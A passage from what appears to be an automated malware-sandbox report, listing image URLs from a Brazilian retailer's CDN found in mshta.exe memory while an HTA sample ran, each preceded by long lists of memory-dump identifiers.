Source: mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510652135.000000000BE53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542189598.00000000071F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578968139.000000000BE53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-LEVE_PAGUE-1678818a0085
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401711671.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555748992.0000000009654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12462713387.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511626967.0000000009653000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OBACUPOM-2e7e4e4c39b5.p
Source: mshta.exe, 00000001.00000003.12556397852.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401711671.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12462713387.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542189598.00000000071F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555a
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.png)
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.pngOF
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.pngV
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-CLIMATIZACAO-6968b0c0fdaa.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-CLIMATIZACAO-6968b0c0fdaa.pngq
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574215733.00000000095EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-ELETROPORTATEIS-bfaadadd69a1.p
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngS
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngY
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngY(
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngde2a.pngg5
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngng
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngsou
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngw.i
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510309350.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 